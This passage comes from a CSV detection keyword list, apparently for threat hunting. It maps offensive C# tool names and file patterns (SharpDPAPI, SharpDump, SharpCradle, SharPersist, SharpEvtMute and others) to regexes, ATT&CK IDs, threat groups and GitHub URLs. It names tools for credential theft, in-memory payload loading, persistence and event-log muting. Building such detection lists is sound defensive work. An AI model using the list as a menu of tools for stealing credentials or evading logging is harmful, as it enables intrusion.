even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCradle*logonpasswords*",".{0,1000}SharpCradle.{0,1000}logonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCrashEventLog.exe*",".{0,1000}SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDcomTrigger.exe*",".{0,1000}SharpDcomTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpDir.exe*",".{0,1000}SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDllProxy*",".{0,1000}SharpDllProxy.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*SharpDomainSpray*",".{0,1000}SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray.*",".{0,1000}SharpDomainSpray\..{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" 
"*SharpDomainSpray-master*",".{0,1000}SharpDomainSpray\-master.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDoor.exe*",".{0,1000}SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI*",".{0,1000}SharpDPAPI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpDPAPI* credentias *",".{0,1000}SharpDPAPI.{0,1000}\scredentias\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI* vaults *",".{0,1000}SharpDPAPI.{0,1000}\svaults\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.csproj*",".{0,1000}SharpDPAPI\.csproj.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.Domain*",".{0,1000}SharpDPAPI\.Domain.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.ps1*",".{0,1000}SharpDPAPI\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.sln*",".{0,1000}SharpDPAPI\.sln.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" 
"*SharpDPAPI.txt*",".{0,1000}SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPIMachine*.cs",".{0,1000}SharpDPAPIMachine.{0,1000}\.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpDPAPI-master*",".{0,1000}SharpDPAPI\-master.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDXWebcam*",".{0,1000}SharpDXWebcam.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","79","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" "*sharpedrchecker*",".{0,1000}sharpedrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEDRChecker.Program*",".{0,1000}SharpEDRChecker\.Program.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEDRChecker/releases*",".{0,1000}SharpEDRChecker\/releases.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using 
EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.cs*",".{0,1000}SharpEfsPotato\.cs.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato.sln*",".{0,1000}SharpEfsPotato\.sln.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsPotato-master*",".{0,1000}SharpEfsPotato\-master.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*SharpEfsTriggeEfs.exe*",".{0,1000}SharpEfsTriggeEfs\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege 
Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharPersist -*",".{0,1000}SharPersist\s\-.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*SharPersist*",".{0,1000}SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" 
"*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventLoader.exe*",".{0,1000}SharpEventLoader\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist.exe*",".{0,1000}SharpEventPersist\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - 
T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEventPersist-main*",".{0,1000}SharpEventPersist\-main.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SharpEvtMute.cs*",".{0,1000}SharpEvtMute\.cs.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpEvtMute.exe*",".{0,1000}SharpEvtMute\.exe.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*SharpEvtMute.pdb*",".{0,1000}SharpEvtMute\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" 
